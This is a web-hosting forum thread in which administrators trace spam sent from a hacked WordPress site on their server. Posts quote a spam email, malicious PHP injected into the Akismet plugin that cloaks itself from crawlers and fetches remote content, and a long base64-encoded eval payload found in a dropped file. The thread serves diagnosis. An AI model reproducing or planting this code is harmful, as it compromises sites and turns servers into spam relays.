Sponsor:

Server and Web Integrator
Link:
Kloxo-MR logo
6.5.0 or 7.0.0
Click for "How to install"
Donation/Sponsorship:
Kloxo-MR is open-source.
Donate and or Sponsorship always welcome.
Click to:
Click Here
Please login or register. 2024-03-28, 23:44:55

Author Topic: My server is sending SPAM but source cannot be tracked !  (Read 15830 times)

0 Members and 1 Guest are viewing this topic.

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
Re: My server is sending SPAM but source cannot be tracked !
« Reply #15 on: 2014-12-15, 05:24:09 »
Another domain suspended - some hacked Wordpress installation :(

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 15,807
  • Karma: +119/-11
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: My server is sending SPAM but source cannot be tracked !
« Reply #16 on: 2014-12-15, 06:47:56 »
Try install wordfence plugins.
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
Re: My server is sending SPAM but source cannot be tracked !
« Reply #17 on: 2014-12-15, 11:11:18 »
Another mail tracked ! It seems phpmailer is sending these e-mails !

I've banned this domain ! Seems to be hacked

Quote
--------------
MESSAGE NUMBER 794367
 --------------
Received: (qmail 772 invoked by uid 7865); 15 Dec 2014 16:53:28 -0000
To: smacker86live@gmail.com
Subject: Re: aergfdgbhdghfr
Date: Mon, 15 Dec 2014 17:53:27 +0100
From: rkjdsef hn yrthynees45 gtyj 6uear grft <xcvdfge3ukyer345y65uhtrdfg@consultant.com>
Message-ID: <22d9c1f88c0e35070ab8f5683042f68d@naszaxxx.com>
X-Priority: 3
X-Mailer: PHPMailer 5.2.2 (http://code.google.com/a/apache-extras.org/p/phpmailer/)
MIME-Version: 1.0
Content-Type: multipart/alternative;
   boundary="b1_22d9c1f88c0e35070ab8f5683042f68d"

--b1_22d9c1f88c0e35070ab8f5683042f68d
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

host http://naszaxxx.com/tvltasf.php?m=s


--b1_22d9c1f88c0e35070ab8f5683042f68d
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

<html><head></head><body>host http://naszaxxx.com/tvltasf.php?m=s<br/>
</body></html>



--b1_22d9c1f88c0e35070ab8f5683042f68d--
« Last Edit: 2014-12-15, 11:16:03 by Spacedust »

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
Re: My server is sending SPAM but source cannot be tracked !
« Reply #18 on: 2014-12-15, 12:45:27 »
Wow - what a nasty hackers. See yourself !



Proper code starts here:

Quote
<?php session_start(); ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

etc.

Then something wrong...

Quote
<?php
#17345a#
/**
 * @package Akismet
 */
/*
Plugin Name: Akismet
Plugin URI: http://akismet.com/
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) <a href="http://akismet.com/get/">Sign up for an Akismet API key</a>, and 3) Go to your Akismet configuration page, and save your API key.
Version: 3.0.0
Author: Automattic
Author URI: http://automattic.com/wordpress-plugins/
License: GPLv2 or later
Text Domain: akismet
*/

/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
*/

if( empty( $zjl ) ) {
    if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match(
            "/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i",
            $_SERVER['HTTP_USER_AGENT']
        )
    ) {
    } else {
        error_reporting( 0 );
        @ini_set( 'display_errors', 0 );
        if( !function_exists( '__url_get_contents' ) ) {
            function __url_get_contents( $remote_url, $timeout )
            {
                if( function_exists( 'curl_exec' ) ) {
                    $ch = curl_init();
                    curl_setopt( $ch, CURLOPT_URL, $remote_url );
                    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
                    curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout );
                    curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds
                    $_url_get_contents_data = curl_exec( $ch );
                    curl_close( $ch );
                } elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) {
                    $ctx = @stream_context_create(
                        array(
                            'http' =>
                                array(
                                    'timeout' => $timeout,
                                )
                        )
                    );
                    $_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx );
                } elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) {
                    $handle = @fopen( $remote_url, "r" );
                    $_url_get_contents_data = @stream_get_contents( $handle );
                } else {
                    $_url_get_contents_data = __file_get_url_contents( $remote_url );
                }
                return $_url_get_contents_data;
            }
        }

        if( !function_exists( '__file_get_url_contents' ) ) {
            function __file_get_url_contents( $remote_url )
            {
                if( preg_match(
                    '/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
                    $remote_url,
                    $matches
                )
                ) {
                    $protocol = strtolower( $matches[1] );
                    $host = $matches[2];
                    $path = $matches[3];
                } else {
                    // Bad remote_url-format
                    return false;
                }
                if( $protocol == "http" ) {
                    $socket = @fsockopen( $host, 80, $errno, $errstr, $timeout );
                } else {
                    // Bad protocol
                    return false;
                }
                if( !$socket ) {
                    // Error creating socket
                    return false;
                }
                $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
                $len_written = @fwrite( $socket, $request );
                if( $len_written === false || $len_written != strlen( $request ) ) {
                    // Error sending request
                    return false;
                }
                $response = "";
                while( !@feof( $socket ) &&
                    ( $buf = @fread( $socket, 4096 ) ) !== false ) {
                    $response .= $buf;
                }
                if( $buf === false ) {
                    // Error reading response
                    return false;
                }
                $end_of_header = strpos( $response, "\r\n\r\n" );
                return substr( $response, $end_of_header + 4 );
            }
        }

        $zjl['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
        $zjl['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];
        $zjl['PHP_SELF'] = $_SERVER['PHP_SELF'];
        $zjl['HTTP_HOST'] = $_SERVER['HTTP_HOST'];
        $zjl['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS'];
        $zjl['SERVER_NAME'] = $_SERVER['SERVER_NAME'];
        $zjl['SERVER_ADDR'] = $_SERVER['SERVER_ADDR'];

Plus a lot of files like this:

Quote
cat tvltasf.php
<?php
eval(gzuncompress(base64_decode('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